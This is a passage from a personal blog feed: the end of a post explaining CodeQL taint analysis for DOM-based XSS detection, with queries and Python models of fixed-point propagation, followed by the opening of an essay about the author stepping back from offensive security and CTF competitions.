<span data-line=""><span style="color:#ADBAC7">    call.</span><span style="color:#DCBDFB">getReceiver</span><span style="color:#ADBAC7">().</span><span style="color:#DCBDFB">getALocalSource</span><span style="color:#ADBAC7">().(</span><span style="color:#F69D50">DataFlow</span><span style="color:#ADBAC7">::</span><span style="color:#F69D50">NewNode</span><span style="color:#ADBAC7">).</span><span style="color:#DCBDFB">getCalleeName</span><span style="color:#ADBAC7">() </span><span style="color:#F47067">=</span><span style="color:#96D0FF"> "DOMParser"</span><span style="color:#F47067"> and</span></span>
<span data-line=""><span style="color:#ADBAC7">    sink </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> call.</span><span style="color:#DCBDFB">getArgument</span><span style="color:#ADBAC7">(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#ADBAC7">  )</span></span>
<span data-line=""><span style="color:#F47067">  or</span></span>
<span data-line=""><span style="color:#ADBAC7">  sink </span><span style="color:#F47067">instanceof</span><span style="color:#F69D50"> DomBasedXss</span><span style="color:#ADBAC7">::</span><span style="color:#F69D50">TooltipSink</span></span>
<span data-line=""><span style="color:#ADBAC7">}</span></span></code></pre></figure>
<p>This defines which nodes in the data flow graph are considered sinks. In this case, we are identifying the properties and methods that can be used to inject
untrusted data into the DOM, such as <code>innerHTML</code>, <code>outerHTML</code>, <code>insertAdjacentHTML</code>, <code>srcdoc</code>, <code>document.write</code>, <code>document.writeln</code>, and <code>DOMParser.parseFromString</code>.
When untrusted data reaches these sinks, it can be used to execute arbitrary JavaScript code in the context of the page.</p>
<p>After the least fixed point is computed (and we have the complete set of all tainted elements in the program), we can then evaluate the sinks against this set
of tainted elements to determine if any tainted data can reach a sink. If so, we have a potential vulnerability.</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="codeql" data-theme="github-dark-dimmed"><code data-language="codeql" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">from</span><span style="color:#F69D50"> DataFlow</span><span style="color:#ADBAC7">::</span><span style="color:#F69D50">PathNode</span><span style="color:#F69D50"> source</span><span style="color:#ADBAC7">, </span><span style="color:#F69D50">DataFlow</span><span style="color:#ADBAC7">::</span><span style="color:#F69D50">PathNode</span><span style="color:#F69D50"> sink</span><span style="color:#ADBAC7">, </span><span style="color:#F69D50">UnsafeDOMManipulationConfiguration</span><span style="color:#F69D50"> config</span></span>
<span data-line=""><span style="color:#F47067">where</span><span style="color:#ADBAC7"> config.</span><span style="color:#DCBDFB">hasFlowPath</span><span style="color:#ADBAC7">(source, sink)</span></span>
<span data-line=""><span style="color:#F47067">select</span><span style="color:#ADBAC7"> sink.</span><span style="color:#DCBDFB">getNode</span><span style="color:#ADBAC7">(), </span><span style="color:#96D0FF">"Potentially unsafe DOM manipulation with $@."</span><span style="color:#ADBAC7">, source.</span><span style="color:#DCBDFB">getNode</span><span style="color:#ADBAC7">(),</span></span>
<span data-line=""><span style="color:#96D0FF">  "untrusted data"</span></span></code></pre></figure>
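<p>To make the evaluation step concrete, here is a minimal Python sketch of the same idea. It is a toy model, not CodeQL's actual implementation: it assumes the data flow graph has already been flattened into plain <code>(pred, succ)</code> edges, and the function name <code>flow_pairs</code> and the node labels are made up for illustration.</p>

```python
from collections import deque


def flow_pairs(edges, sources, sinks):
    """Return every (source, sink) pair connected by a chain of flow edges."""
    successors = {}
    for pred, succ in edges:
        successors.setdefault(pred, set()).add(succ)

    pairs = set()
    for source in sources:
        tainted = {source}          # first iteration: only the source itself
        worklist = deque([source])
        while worklist:             # stops once no new node becomes tainted
            node = worklist.popleft()
            for succ in successors.get(node, ()):
                if succ not in tainted:
                    tainted.add(succ)
                    worklist.append(succ)
        # Evaluate the sinks against the completed set of tainted nodes.
        pairs.update((source, node) for node in tainted if node in sinks)
    return pairs


# Hypothetical flow graph for: el.innerHTML = decodeURIComponent(location.hash)
edges = [
    ("location.hash", "decoded"),
    ("decoded", "innerHTML rhs"),
    ("constant", "srcdoc rhs"),
]
result = flow_pairs(edges, {"location.hash"}, {"innerHTML rhs", "srcdoc rhs"})
print(sorted(result))  # prints [('location.hash', 'innerHTML rhs')]
```

<p>Only the <code>innerHTML</code> assignment is reported, because the <code>srcdoc</code> value is fed by a constant that no source ever reaches.</p>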
<h2>Expanding the propagation function</h2>
<p>Sometimes, the default taint steps are insufficient to capture the desired propagation. One might extend this by overriding <code>isAdditionalTaintStep</code>:</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="codeql" data-theme="github-dark-dimmed"><code data-language="codeql" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">override</span><span style="color:#F47067"> predicate</span><span style="color:#DCBDFB"> isAdditionalTaintStep</span><span style="color:#ADBAC7">(</span><span style="color:#F69D50">DataFlow</span><span style="color:#ADBAC7">::</span><span style="color:#F69D50">Node</span><span style="color:#F69D50"> pred</span><span style="color:#ADBAC7">, </span><span style="color:#F69D50">DataFlow</span><span style="color:#ADBAC7">::</span><span style="color:#F69D50">Node</span><span style="color:#F69D50"> succ</span><span style="color:#ADBAC7">) {</span></span>
<span data-line=""><span style="color:#F47067">  exists</span><span style="color:#ADBAC7">(</span><span style="color:#F69D50">DataFlow</span><span style="color:#ADBAC7">::</span><span style="color:#F69D50">ArrayCreationNode</span><span style="color:#ADBAC7"> array |</span></span>
<span data-line=""><span style="color:#ADBAC7">    pred </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> array.</span><span style="color:#DCBDFB">getAnElement</span><span style="color:#ADBAC7">() </span><span style="color:#F47067">and</span></span>
<span data-line=""><span style="color:#ADBAC7">    succ </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> array</span></span>
<span data-line=""><span style="color:#ADBAC7">  )</span></span>
<span data-line=""><span style="color:#F47067">  or</span></span>
<span data-line=""><span style="color:#F47067">  exists</span><span style="color:#ADBAC7">(</span><span style="color:#F69D50">DataFlow</span><span style="color:#ADBAC7">::</span><span style="color:#F69D50">MethodCallNode</span><span style="color:#ADBAC7"> find |</span></span>
<span data-line=""><span style="color:#ADBAC7">    find.</span><span style="color:#DCBDFB">getMethodName</span><span style="color:#ADBAC7">().</span><span style="color:#DCBDFB">regexpMatch</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"find|filter|some|every|map"</span><span style="color:#ADBAC7">) </span><span style="color:#F47067">and</span></span>
<span data-line=""><span style="color:#ADBAC7">    pred </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> find.</span><span style="color:#DCBDFB">getReceiver</span><span style="color:#ADBAC7">() </span><span style="color:#F47067">and</span></span>
<span data-line=""><span style="color:#ADBAC7">    succ </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> find.</span><span style="color:#DCBDFB">getCallback</span><span style="color:#ADBAC7">(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">).</span><span style="color:#DCBDFB">getParameter</span><span style="color:#ADBAC7">(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#ADBAC7">  )</span></span>
<span data-line=""><span style="color:#ADBAC7">}</span></span></code></pre></figure>
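<p>This propagates taint from each element of a newly created array to the array itself, and from the receiver of array methods like <code>find</code>, <code>filter</code>, <code>some</code>, <code>every</code>, and <code>map</code> to the first parameter of their callback.</p>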
<p>One might also want to stop propagation of taint at a sanitization step. When a node is a sanitizer, its output is considered untainted, even if the input is tainted.
This can be done by overriding <code>isSanitizer</code>:</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="codeql" data-theme="github-dark-dimmed"><code data-language="codeql" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">override</span><span style="color:#F47067"> predicate</span><span style="color:#DCBDFB"> isSanitizer</span><span style="color:#ADBAC7">(</span><span style="color:#F69D50">DataFlow</span><span style="color:#ADBAC7">::</span><span style="color:#F69D50">Node</span><span style="color:#F69D50"> node</span><span style="color:#ADBAC7">) {</span></span>
<span data-line=""><span style="color:#ADBAC7">  node </span><span style="color:#F47067">=</span><span style="color:#F69D50"> DataFlow</span><span style="color:#ADBAC7">::</span><span style="color:#DCBDFB">moduleImport</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"dompurify"</span><span style="color:#ADBAC7">).</span><span style="color:#DCBDFB">getAMemberCall</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"sanitize"</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#ADBAC7">}</span></span></code></pre></figure>
<p>Here, we are considering the <code>sanitize</code> method from the <code>DOMPurify</code> library as a sanitizer.</p>
<p>These modify our propagation function <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>F</mi></mrow><annotation encoding="application/x-tex">F</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.13889em">F</span></span></span></span> to include or exclude desired nodes when propagating taint.</p>
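<p>As a rough illustration of how these two overrides change the result, the Python sketch below models the propagation function as a function from sets of nodes to sets of nodes. Everything in it is hypothetical: the names <code>make_propagation</code> and <code>least_fixed_point</code>, the node labels, and the simplification that a sanitizer node is simply removed from the tainted set.</p>

```python
def make_propagation(default_steps, additional_steps, sanitizers, sources):
    """Build F: one round of taint propagation over the combined step relation."""
    steps = set(default_steps) | set(additional_steps)

    def propagate(tainted):
        reached = set(sources) | set(tainted)
        for pred, succ in steps:
            if pred in tainted:
                reached.add(succ)
        # Sanitizer nodes never count as tainted, so nothing flows out of them.
        return reached - set(sanitizers)

    return propagate


def least_fixed_point(propagate):
    """Apply F repeatedly, starting from the empty set, until nothing changes."""
    current = set()
    while True:
        following = propagate(current)
        if following == current:
            return current
        current = following


# Hypothetical nodes: "input" is the source, sink_a sits behind a sanitize()
# call, and sink_b is only reachable through an array and a callback parameter.
sources = {"input"}
default_steps = [("input", "sanitize_call"), ("sanitize_call", "sink_a"), ("param", "sink_b")]
additional_steps = [("input", "array"), ("array", "param")]
sanitizers = {"sanitize_call"}

unmodified = least_fixed_point(make_propagation(default_steps, [], [], sources))
modified = least_fixed_point(make_propagation(default_steps, additional_steps, sanitizers, sources))
print(sorted(unmodified))
print(sorted(modified))
```

<p>With the default steps alone, taint reaches <code>sink_a</code> through the sanitizer call and misses <code>sink_b</code>. With the extra steps and the sanitizer in place, the fixed point flips: <code>sink_b</code> becomes tainted and <code>sink_a</code> does not.</p>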
<h2>Aside: transitive closures</h2>
<p>CodeQL has built-in support for transitive closures, which is pretty cool.</p>
<p>The transitive closure of a relation <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>R</mi></mrow><annotation encoding="application/x-tex">R</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.00773em">R</span></span></span></span> is the smallest relation <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><msup><mi>R</mi><mo>+</mo></msup></mrow><annotation encoding="application/x-tex">R^+</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.7713em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.00773em">R</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.7713em"><span style="top:-3.063em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mbin mtight">+</span></span></span></span></span></span></span></span></span></span></span> that contains <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>R</mi></mrow><annotation encoding="application/x-tex">R</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.00773em">R</span></span></span></span> and is transitive. 
Formally, <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><msup><mi>R</mi><mo>+</mo></msup></mrow><annotation encoding="application/x-tex">R^+</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.7713em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.00773em">R</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.7713em"><span style="top:-3.063em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mbin mtight">+</span></span></span></span></span></span></span></span></span></span></span> is the intersection of all transitive relations
that contain <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>R</mi></mrow><annotation encoding="application/x-tex">R</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.00773em">R</span></span></span></span>. This can be defined inductively:</p>
<span class="katex-display"><span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML" display="block"><semantics><mtable rowspacing="0.25em" columnalign="right left" columnspacing="0em"><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><msup><mi>R</mi><mn>1</mn></msup></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><mo>=</mo><mi>R</mi></mrow></mstyle></mtd></mtr><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><msup><mi>R</mi><mrow><mi>n</mi><mo>+</mo><mn>1</mn></mrow></msup></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><mo>=</mo><msup><mi>R</mi><mi>n</mi></msup><mo>∪</mo><mo stretchy="false">(</mo><mi>R</mi><mo>∘</mo><msup><mi>R</mi><mi>n</mi></msup><mo stretchy="false">)</mo></mrow></mstyle></mtd></mtr></mtable><annotation encoding="application/x-tex">\begin{align*}
R^1 &amp;= R \\
R^{n+1} &amp;= R^n \cup (R \circ R^n)
\end{align*}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:3.0482em;vertical-align:-1.2741em"></span><span class="mord"><span class="mtable"><span class="col-align-r"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:1.7741em"><span style="top:-3.91em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord"><span class="mord mathnormal" style="margin-right:0.00773em">R</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8641em"><span style="top:-3.113em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">1</span></span></span></span></span></span></span></span></span></span><span style="top:-2.3859em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord"><span class="mord mathnormal" style="margin-right:0.00773em">R</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8641em"><span style="top:-3.113em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mathnormal mtight">n</span><span class="mbin mtight">+</span><span class="mord mtight">1</span></span></span></span></span></span></span></span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:1.2741em"><span></span></span></span></span></span><span class="col-align-l"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:1.7741em"><span style="top:-3.91em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord"></span><span class="mspace" style="margin-right:0.2778em"></span><span 
class="mrel">=</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mord mathnormal" style="margin-right:0.00773em">R</span></span></span><span style="top:-2.3859em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord"></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.00773em">R</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.7144em"><span style="top:-3.113em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">n</span></span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2222em"></span><span class="mbin">∪</span><span class="mspace" style="margin-right:0.2222em"></span><span class="mopen">(</span><span class="mord mathnormal" style="margin-right:0.00773em">R</span><span class="mspace" style="margin-right:0.2222em"></span><span class="mbin">∘</span><span class="mspace" style="margin-right:0.2222em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.00773em">R</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.7144em"><span style="top:-3.113em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">n</span></span></span></span></span></span></span></span><span class="mclose">)</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:1.2741em"><span></span></span></span></span></span></span></span></span></span></span></span>
<p>The <em>reflexive</em> transitive closure is similar, but includes the identity relation:</p>
<span class="katex-display"><span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML" display="block"><semantics><mtable rowspacing="0.25em" columnalign="right left" columnspacing="0em"><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><msup><mi>R</mi><mn>0</mn></msup></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><mo>=</mo><mtext>id</mtext></mrow></mstyle></mtd></mtr><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><msup><mi>R</mi><mrow><mi>n</mi><mo>+</mo><mn>1</mn></mrow></msup></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><mo>=</mo><msup><mi>R</mi><mi>n</mi></msup><mo>∪</mo><mo stretchy="false">(</mo><mi>R</mi><mo>∘</mo><msup><mi>R</mi><mi>n</mi></msup><mo stretchy="false">)</mo></mrow></mstyle></mtd></mtr></mtable><annotation encoding="application/x-tex">\begin{align*}
R^0 &amp;= \text{id} \\
R^{n+1} &amp;= R^n \cup (R \circ R^n)
\end{align*}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:3.0482em;vertical-align:-1.2741em"></span><span class="mord"><span class="mtable"><span class="col-align-r"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:1.7741em"><span style="top:-3.91em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord"><span class="mord mathnormal" style="margin-right:0.00773em">R</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8641em"><span style="top:-3.113em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">0</span></span></span></span></span></span></span></span></span></span><span style="top:-2.3859em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord"><span class="mord mathnormal" style="margin-right:0.00773em">R</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8641em"><span style="top:-3.113em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mathnormal mtight">n</span><span class="mbin mtight">+</span><span class="mord mtight">1</span></span></span></span></span></span></span></span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:1.2741em"><span></span></span></span></span></span><span class="col-align-l"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:1.7741em"><span style="top:-3.91em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord"></span><span class="mspace" style="margin-right:0.2778em"></span><span 
class="mrel">=</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mord text"><span class="mord">id</span></span></span></span><span style="top:-2.3859em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord"></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.00773em">R</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.7144em"><span style="top:-3.113em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">n</span></span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2222em"></span><span class="mbin">∪</span><span class="mspace" style="margin-right:0.2222em"></span><span class="mopen">(</span><span class="mord mathnormal" style="margin-right:0.00773em">R</span><span class="mspace" style="margin-right:0.2222em"></span><span class="mbin">∘</span><span class="mspace" style="margin-right:0.2222em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.00773em">R</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.7144em"><span style="top:-3.113em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">n</span></span></span></span></span></span></span></span><span class="mclose">)</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:1.2741em"><span></span></span></span></span></span></span></span></span></span></span></span>
<p>In CodeQL, we can use the <code>+</code> operator to denote the transitive closure of a predicate, and the <code>*</code> operator to denote the reflexive transitive closure. For example:</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="codeql" data-theme="github-dark-dimmed"><code data-language="codeql" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">predicate</span><span style="color:#DCBDFB"> isReachableFrom</span><span style="color:#ADBAC7">(</span><span style="color:#F69D50">BasicBlock</span><span style="color:#F69D50"> start</span><span style="color:#ADBAC7">, </span><span style="color:#F69D50">BasicBlock</span><span style="color:#F69D50"> end</span><span style="color:#ADBAC7">) {</span></span>
<span data-line=""><span style="color:#ADBAC7">  end </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> start.</span><span style="color:#DCBDFB">getASuccessor*</span><span style="color:#ADBAC7">()</span></span>
<span data-line=""><span style="color:#ADBAC7">}</span></span></code></pre></figure>
<p>This predicate evaluates to the set of all (<code>start</code>, <code>end</code>) pairs such that <code>end</code> is reachable from <code>start</code> by following zero or more edges in the control flow graph.</p>
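<p>For intuition, the inductive construction can be run by hand on a tiny relation. The Python sketch below is only a model of the semantics, not of how CodeQL evaluates closures internally. The helper names <code>compose</code> and <code>closure</code> and the three block labels are assumptions for the example. The non-reflexive iteration starts from the relation itself, since composing with an empty relation would never add a pair.</p>

```python
def compose(outer, inner):
    """Relational composition: (a, c) whenever inner has (a, b) and outer has (b, c)."""
    return {(a, c) for (a, b) in inner for (b2, c) in outer if b == b2}


def closure(relation, nodes, reflexive=False):
    """Grow the relation by composing with R until it stops changing."""
    # Reflexive closure starts from the identity; transitive closure starts from R.
    current = {(n, n) for n in nodes} if reflexive else set(relation)
    while True:
        following = current | compose(relation, current)
        if following == current:
            return current
        current = following


# Hypothetical control flow graph with three basic blocks in a row.
blocks = {"b1", "b2", "b3"}
successor = {("b1", "b2"), ("b2", "b3")}

plus = closure(successor, blocks)                  # like getASuccessor+()
star = closure(successor, blocks, reflexive=True)  # like getASuccessor*()
print(sorted(plus))
print(sorted(star))
```

<p>The only difference between the two results is the identity pairs: <code>star</code> also relates every block to itself, which matches the "zero or more edges" reading of <code>*</code>.</p>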
<h2>Conclusion</h2>
<p>This is my humble attempt to pen down my mental model of how CodeQL works under the hood, which helps me to visualize how my queries are executed and how the
results are derived. It's a really interesting and powerful tool that, while lacking the user-friendliness of some other static analysis tools, makes up for it
with its flexibility and expressiveness.</p>]]></content:encoded>
            <author>ping@analogue.computer (Zeyu (Zayne) Zhang)</author>
        </item>
        <item>
            <title><![CDATA[Why I'm "quitting" (offensive) security]]></title>
            <link>https://www.analogue.computer/blog/why-im-quitting-security</link>
            <guid>https://www.analogue.computer/blog/why-im-quitting-security</guid>
            <pubDate>Wed, 21 Aug 2024 00:00:00 GMT</pubDate>
            <content:encoded><![CDATA[<p>When I interview for internships nowadays, one question that recruiters often ask me is "why not cybersecurity?".
Funnily enough, I've stepped back from security since the start of this year,
but many people still think I'm the "hacker" and competitive CTF player I used to be.
Even my friends and family often ask me how things are going in the industry, and whether I'm still doing "hacking stuff".</p>
<h2>How did we get here?</h2>
<p>To give you a bit more context about myself, I discovered infosec 3 years ago when I was trying to get out of being sent to the infantry.
As a Singaporean male, I had to serve in the army. It just so happened that there was a new scheme that allowed people to serve in "cybersecurity" units,
and the prospect of spending my days in an air-conditioned office instead of in the middle of a jungle was very appealing to me.</p>
<p>So without any knowledge of security at all, I borrowed a textbook from my teacher at the time and did what I was good at as an A-level student: memorizing
as much as I could a week before the exam. By a stroke of luck, I got in, and the rest is history.</p>
<p>My 18-year-old self, who at the time was pretty sure he wanted to study Physics in university, probably wouldn't have believed that his next 3 years would
see him in Las Vegas, Lausanne, Stockholm, and other places around the world competing in CTF competitions, meeting some of the most talented people in the
industry, and spending countless hours in front of a computer screen instead of solving differential equations.</p>
<figure class="mx-auto"><img alt="Cyber SEA Games 2022, Thailand" loading="lazy" width="1479" height="1109" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fcybersea.ca8f06b2.jpg&amp;w=1920&amp;q=75 1x, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fcybersea.ca8f06b2.jpg&amp;w=3840&amp;q=75 2x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fcybersea.ca8f06b2.jpg&amp;w=3840&amp;q=75"><figcaption class="text-center">Team Singapore @ Cyber SEA Games 2022</figcaption></figure>
<p>I went through some structured training in the army with an emphasis on blue teaming. Then I tried my hand at CTFs for the first time — it was brutal.
I could solve maybe 1 or 2 basic challenges, but the rest of the time I just sat there being confused. But realising just how much I didn't know was
something that hooked me in, and I played CTFs almost every weekend for the next few months. We even formed our own team, Social Engineering Experts,
which in 2022 and 2023 was the top CTF team in Singapore.</p>
<p>Eventually I found my niche in web security. CTF trains you really well for source code review and exploit development, so I started poking around
open source projects and eventually got credited for 15 CVEs, most of which were from my deep dive into
<a href="https://infosec.zeyu2001.com/2022/http-request-smuggling-in-the-multiverse-of-parsing-flaws">HTTP request smuggling</a>.</p>
<p>I also started doing bug bounties because, among other things, it was fun to hack my own government. I was invited to three private time-bound
programs organised by the Singapore government, and was ranked 1st (by "signal", or impact) in each one among global participants.</p>
<figure class="mx-auto"><img alt="MINDEF Bug Bounty Programme" loading="lazy" width="4464" height="2976" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fbugbounty.04a0329a.jpg&amp;w=3840&amp;q=75 1x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fbugbounty.04a0329a.jpg&amp;w=3840&amp;q=75"><figcaption class="text-center">MINDEF Bug Bounty Programme</figcaption></figure>
<p>It was really fun. I ended up playing CTFs with <a href="https://ctftime.org/team/205897/">Blue Water</a>,
with whom I won 2nd place at the <a href="https://defcon.org/">DEF CON</a> CTF in 2023. At some point, a teammate reached out to me and asked if I wanted to join
Electrovolt, a security consultancy that was partnering with <a href="https://cure53.de/">Cure53</a>. I started doing some work with them on a freelance basis,
whenever I had the time. The work has been super cool, working with some really talented people for really big clients.
This was also around the time I started my internship with TikTok, where I was doing security research at scale.</p>
<h2>The turning point</h2>
<p>After some time trying to break everything I could get my hands on, I started to feel like I was just breaking things for the sake of breaking them.
I was getting tired of the constant churn of finding bugs, writing reports, and moving on to the next target.
I was tired of the constant pressure to be the best, to be the first, to be the most impactful.</p>
<p>The biggest question, however, simply boiled down to: "why don't they <strong><em>just</em></strong> fix it? It's not that hard." I couldn't understand why teams would
ignore important vulnerabilities, or why something would be fixed only to be broken again in the next release. I couldn't understand why we were still finding
the same classes of vulnerabilities that have been known for years. It's like playing whack-a-mole, but the moles are the size of elephants and there's
only one hammer.</p>
<h2>University</h2>
<p>But no time to dwell on that too much, because I was starting university. I took this as an opportunity to take a step back from living and breathing
security to enjoy life and explore other interests.</p>
<p>I didn't expect my first year at Cambridge to be <em>this</em> busy. To be honest, I spent most of the year thinking I was going to fail. Everyone else seemed
to be doing so much better, and I was returning to a really difficult technical degree after years of not doing any math or theoretical computer science.
Cambridge certainly has a way of making you feel like you're not good enough, even when you are: I managed a first-class grade in the end.</p>
<p>I was still doing <em>some</em> CTFs (I started playing with the Cambridge team, cheriPI) and freelance work on the side, but there was just a lot more
to try. I started doing hackathons and for the first time, I started thinking about what products people actually need.</p>
<figure class="mx-auto"><img alt="CheriPI @ LakeCTF 2023" loading="lazy" width="2048" height="1366" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fcheripi.c919e331.jpg&amp;w=2048&amp;q=75 1x, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fcheripi.c919e331.jpg&amp;w=3840&amp;q=75 2x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fcheripi.c919e331.jpg&amp;w=3840&amp;q=75"><figcaption class="text-center">CheriPI @ LakeCTF 2023</figcaption></figure>
<p>A hackathon felt like a microcosm of a software shop. You have a team, a deadline, and a goal. No one cares about security when you're trying to get
a product out the door.</p>
